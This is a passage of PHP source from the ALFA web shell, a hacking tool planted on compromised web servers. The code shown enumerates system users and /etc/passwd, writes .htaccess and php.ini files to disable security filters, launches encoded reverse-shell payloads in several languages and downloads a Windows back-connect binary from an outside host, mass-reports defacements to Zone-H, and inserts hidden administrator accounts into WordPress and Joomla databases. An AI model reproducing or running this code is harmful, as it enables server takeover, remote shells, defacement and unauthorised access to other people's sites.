if(function_exists("posix_getpwuid") && function_exists("fileowner")){
	

	

	

	
 if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){
	

	

	

	
 $user = $user['name'];
	

	

	

	
 }
	

	

	

	
}else{
	

	

	

	
 if(_alfa_can_runCommand(true,true)){
	

	

	

	
 $user = alfaEx("stat -c '%U' /etc/valiases/".$rep);
	

	

	

	
 }
	

	

	

	
}
	

	

	

	
if(!empty($user)&&$user!='root'){
	

	

	

	
echo __pre()."
	

	

	

	

	


	

		
			

				User: 
				{$user}
			

			

				site: 
				{$rep}
			

		
	
";
	

	

	

	
}else {echo __pre().'No such file or directory Or Disable Functions is not NONE...';}
	

	

	

	
}else{
	

	

	

	
$site = trim($_POST['alfa7']);
	

	

	

	
$rep = str_replace(array("https://","http://","www."),"",$site);
	

	

	

	
$users = _alfa_file("/etc/virtual/domainowners");
	

	

	

	
foreach($users as $boz){
	

	

	

	
$ex = explode(":",$boz);
	

	

	

	
if($ex[0] == $rep){
	

	

	

	
echo __pre()."
	

	

	

	

	

	

	

	

	


	

		
			

				User: 
				".trim($ex[1])."
			

			

				site: 
				{$rep}
			

		
	
";break;}}}}}
	

	

	

	
if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){
	

	

	

	
if(!_alfa_file_exists("/etc/virtual/domainowners")){
	

	

	

	
echo __pre();
	

	

	

	
$i = 0;
	

	

	

	
while ($i < 60000) {
	

	

	

	
$line = @posix_getpwuid($i);
	

	

	

	
if (!empty($line)) {
	

	

	

	
while (list ($key, $vl) = each($line)){
	

	

	

	
echo $vl."\n";
	

	

	

	
break;}}$i++;}
	

	

	

	
}else{echo __pre();
	

	

	

	
$users = _alfa_file("/etc/virtual/domainowners");
	

	

	

	
foreach($users as $boz){
	

	

	

	
$user = explode(":",$boz);
	

	

	

	
echo trim($user[1]).'
	

	
';}}}
	

	

	

	
if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){
	

	

	

	
echo __pre();
	

	

	

	
if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){
	

	

	

	
for($uid=0;$uid<60000;$uid++){
	

	

	

	
$ara = @posix_getpwuid($uid);
	

	

	

	
if(!empty($ara)){
	

	

	

	
while(list ($key, $val) = each($ara)){
	

	

	

	
echo "$val:";
	

	

	

	
}echo "\n";}}
	

	

	

	
}else{__alert('failed...');}}
	

	

	

	
if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){
	

	

	

	
@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n\nSec------Engine Off\nSec------ScanPOST Off\n");
	

	

	

	
echo 'htaccess for Apache created...!';
	

	

	

	
}
	

	

	

	
if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){
	

	

	

	
@__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
	

	

	

	
echo ' php.ini created...!';
	

	

	

	
}
	

	

	

	
if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){
	

	

	

	
@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n\nForceType application/x-httpd-php4\n\n\nSecFilterEngine Off\nSecFilterScanPOST Off\n");
	

	

	

	
echo 'htaccess for Litespeed created...!';
	

	

	

	
}
	

	

	

	
echo "
";







alfafooter();







}







function __get_resource($content){







return @gzinflate(__ZGVjb2Rlcg($content));







}







function __write_file($file, $content){







if($fh = @fopen($file, "wb")){







if(fwrite($fh, $content)!==false) return true;







}







return false;







}







function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){







$res = "[ Success...! ]";







$err = "[ Failed...! ]";







if($evalOptions!="") $evalOptions = $evalOptions." ";







if($evalArguments!="") $evalArguments = " ".$evalArguments;







if($evalType=="c"){







$tmpdir = ALFA_TEMPDIR;







chdir($tmpdir);







if(is_writable($tmpdir)){







$uniq = substr(md5(time()),0,8);







$filename = $evalType.$uniq.".c";







$path = $filename;







if(__write_file($path, $evalCode)){







$ext = ($GLOBALS['sys']=='win')? ".exe":".out";







$pathres = $filename.$ext;







$evalOptions = "-o ".$pathres." ".$evalOptions;







$cmd = "gcc ".$evalOptions.$path;







alfaEx($cmd);







if(is_file($pathres)){







if(chmod($pathres, 0755)){







$cmd = $pathres.$evalArguments;







alfaEx($cmd);







}else{$res = $err;}







unlink($pathres);







}else{$res = $err;}







unlink($path);







}else{$res = $err;}







}







return $res;







}elseif($evalType=="java"){







$tmpdir = ALFA_TEMPDIR;







chdir($tmpdir);







if(is_writable($tmpdir)){







if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){







$classname = trim($r[1]);







$filename = $classname;







}else{







$uniq = substr(md5(time()),0,8);







$filename = $evalType.$uniq;







$evalCode = "class ".$filename." { ".$evalCode . " } ";







}







$path = $filename.".java";







if(__write_file($path, $evalCode)){







$cmd = "javac ".$evalOptions.$path;







alfaEx($cmd);







$pathres = $filename.".class";







if(is_file($pathres)){







if(chmod($pathres, 0755)){







$cmd = "java ".$filename.$evalArguments;







alfaEx($cmd);







}else{$res = $err;}







unlink($pathres);







}else{$res = $err;}







unlink($path);







}else{$res = $err;}







}







return $res;







}







return false;







}







function alfaconnect(){







alfahead();







$php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";







$python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";







$perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";







$ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";







$node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";







$c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";







$java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";







echo "




	

	

	

	
| Back Connect |

	

	

	

	
";
	

	

	

	
echo "
	

	

		

		

		

		

		

		
Mehtod:

		

		
		

		
Use:

		

		
		

		

			

			
IP:

			

			
			
 

		

		
Port: 

		

		
		

		
		
 

	

	


	

		

		

		
 

	

	
Run ` nc -l -v -p port ` on your computer and press ` >> ` button

	

	


	

		

		

		
 

	

	
";
	

	

	

	
if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){
	

	

	

	
$lang = $_POST['alfa1'];
	

	

	

	
$ip = $_POST['alfa2'];
	

	

	

	
$port = $_POST['alfa3'];
	

	

	

	
$arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);
	

	

	

	
$tmpdir = ALFA_TEMPDIR;
	

	

	

	
$name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);
	

	

	

	
$allow = array('perl','ruby','python','node');
	

	

	

	
eval('$lan=$'.$lang.';');
	

	

	

	
if(in_array($lang,$allow)){
	

	

	

	
if(__write_file($name,__get_resource($lan))){
	

	

	

	
if(_alfa_can_runCommand(true,true)){
	

	

	

	
$os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';
	

	

	

	
$out = alfaEx("$lang $name $arg $os");
	

	

	

	
if($out==''){$out="[ Finished...! ]";}
	

	

	

	
echo("
{$out}
");
	

	

	

	
}
	

	

	

	
}else{
	

	

	

	
echo("
[ Failed...! ]
");
	

	

	

	
}
	

	

	

	
}
	

	

	

	
if($lang=='java'||$lang=='c'){
	

	

	

	
$code = __get_resource($lan);
	

	

	

	
$out = nl2br(bcinit($lang, $code,'',''));
	

	

	

	
echo("
{$out}
");
	

	

	

	
}
	

	

	

	
if($lang=='bcwin'){
	

	

	

	
$alfa = new AlfaCURL();
	

	

	

	
$s = $alfa->Send('http://solevisible.com/bc/windows.exe');
	

	

	

	
$tmpdir = ALFA_TEMPDIR;
	

	

	

	
$f = @fopen($tmpdir.'/bcwin.exe','w+');
	

	

	

	
@fwrite($f, $s);
	

	

	

	
@fclose($f);
	

	

	

	
$out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
	

	

	

	
}
	

	

	

	
if($lang=='php'){
	

	

	

	
echo "
";

$code = __get_resource($lan);

if($code!==false){

$code = "\$target = \"".$arg."\";\n".$code;

eval($code);

echo("[ Finished...! ]");

}

echo "
";
	

	

	

	
}
	

	

	

	
}
	

	

	

	
echo "
";







alfafooter();







}







function alfazoneh(){







alfahead();







echo '



';
	

	

	

	
if(!function_exists('curl_version')){
	

	

	

	
echo "
PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK
";
	

	

	

	
}
	

	

	

	
$hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');
	

	

	

	
$reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');
	

	

	

	
echo '
	

	

	

	

	

	

	

	
| Zone-h Mass Poster |

	

	

	

	

	

	

	

	

		

		

		

		

		

		
		

		

		

		

		

		

		

		

		

		

		

		
		

		

		

		
		

		

		

		

		

		

		

		
		

		

		

		

		

		

		

		


		

			

			
			
 

		

		

		

		

		
 
';
	

	

	

	
if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){
	

	

	

	
ob_start();
	

	

	

	
$hacker = $_POST['alfa1'];
	

	

	

	
$method = $_POST['alfa2'];
	

	

	

	
$neden = $_POST['alfa3'];
	

	

	

	
$site = $_POST['alfa4'];
	

	

	

	
if(empty($hacker)){
	

	

	

	
die (__pre()."[+] YOU MUST FILL THE ATTACKER NAME [+]");
	

	

	

	
}elseif($method == "------------------------------------SELECT-------------------------------------"){
	

	

	

	
die(__pre()."[+] YOU MUST SELECT THE METHOD [+]");
	

	

	

	
}elseif($neden == "------------------------------------SELECT-------------------------------------"){
	

	

	

	
die(__pre()."[+] YOU MUST SELECT THE REASON [+]");
	

	

	

	
}elseif(empty($site)){
	

	

	

	
die(__pre()."[+] YOU MUST INTER THE SITES LIST [+]");
	

	

	

	
}
	

	

	

	
$i = 0;
	

	

	

	
$sites = explode("\n", $site);
	

	

	

	
$alfa = new AlfaCURL();
	

	

	

	
while($i < count($sites)){
	

	

	

	
if(substr($sites[$i], 0, 4) != "http"){
	

	

	

	
$sites[$i] = "http://".$sites[$i];
	

	

	

	
}
	

	

	

	
$alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);
	

	

	

	
++$i;
	

	

	

	
}
	

	

	

	
echo __pre()."[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]";
	

	

	

	
}
	

	

	

	
echo "
";







alfafooter();







}







function alfapwchanger(){







alfahead();















echo '




	

	

	

	
| Add New Admin |

	

	

	

	

	

	


	
';
		

		

		

		
$vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
		

		

		

		
Alfa_Create_A_Tag('pwchanger',$vals);
		

		

		

		
echo '
';
	

	

	

	
if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){
	

	

	

	

	

	

	

	
echo __pre().'
	

	
| WordPress |

	

	

	

	

	

	


	
'.getConfigHtml('wp').'

	

	
';
		

		

		

		
$table = array('td1' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
		

		

		

		
 'td2' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td3' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td4' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td5' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),
		

		

		

		
 'td6' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
		

		

		

		
 'td7' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
		

		

		

		
 'td8' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
		

		

		

		
);
		

		

		

		
create_table($table);
		

		

		

		
echo '
		

		


		

			

			
			
 

		
 
';
	

	

	

	
if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
	

	

	

	
$localhost = $_POST['alfa3'];
	

	

	

	
$database = $_POST['alfa4'];
	

	

	

	
$username = $_POST['alfa5'];
	

	

	

	
$password = $_POST['alfa6'];
	

	

	

	
$admin = $_POST['alfa8'];
	

	

	

	
$SQL = $_POST['alfa9'];
	

	

	

	
$prefix = $_POST['alfa10'];
	

	

	

	
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
	

	

	

	
$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
	

	

	

	
$solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
	

	

	

	
$sole = @mysqli_num_rows($solevisible);
	

	

	

	
if ($sole == 1){
	

	

	

	
$solevis = @mysqli_fetch_assoc($solevisible);
	

	

	

	
$res = $solevis['ID'];
	

	

	

	
}
	

	

	

	
$solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
	

	

	

	
if($solevisible){
	

	

	

	
__alert('Success... '.$admin.' is created...');}
	

	

	

	
}
	

	

	

	
}
	

	

	

	
if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){
	

	

	

	

	

	

	

	
echo __pre().'
	

	
| Joomla |

	

	


	

		

		

		
 

	

	


	
'.getConfigHtml('joomla').'

	

	
';
		

		

		

		
$table = array('td1' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
		

		

		

		
 'td2' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td3' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td4' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
		

		

		

		
 'td5' =>
		

		

		

		
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),
		

		

		

		
 'td6' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
		

		

		

		
 'td7' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
		

		

		

		
 'td8' =>
		

		

		

		
 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
		

		

		

		
);
		

		

		

		
create_table($table);
		

		

		

		
echo '
		

		


		

			

			
			
 

		
 
';
	

	

	

	
if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
	

	

	

	
$localhost = $_POST['alfa3'];
	

	

	

	
$database = $_POST['alfa4'];
	

	

	

	
$username = $_POST['alfa5'];
	

	

	

	
$password = $_POST['alfa6'];
	

	

	

	
$admin = $_POST['alfa8'];
	

	

	

	
$SQL = $_POST['alfa9'];
	

	

	

	
$prefix = $_POST['alfa10'];
	

	

	

	
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
	

	

	

	
$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
	

	

	

	
$solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
	

	

	

	
$sole =@mysqli_num_rows($solevisible);
	

	

	

	
if ($sole == 1){
	

	

	

	
$solevis =@mysqli_fetch_assoc($solevisible);
	

	

	

	
$res = $solevis['id'];
	

	

	

	
}
	

	

	

	
$solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
	

	

	

	
if($solevisible){
	

	

	

	
__alert('Success... '.$admin.' is created...');}
	

	

	

	
}
	

	

	

	
}
	

	

	

	
if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){
	

	

	

	

	

	

	

	
echo __pre().'
	

	
| vBulletin |
		

		

			

			


			
'.getConfigHtml('vb').'

			

			
';
				

				

				

				
$table = array('td1' =>
				

				

				

				
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
				

				

				

				
 'td2' =>
				

				

				

				
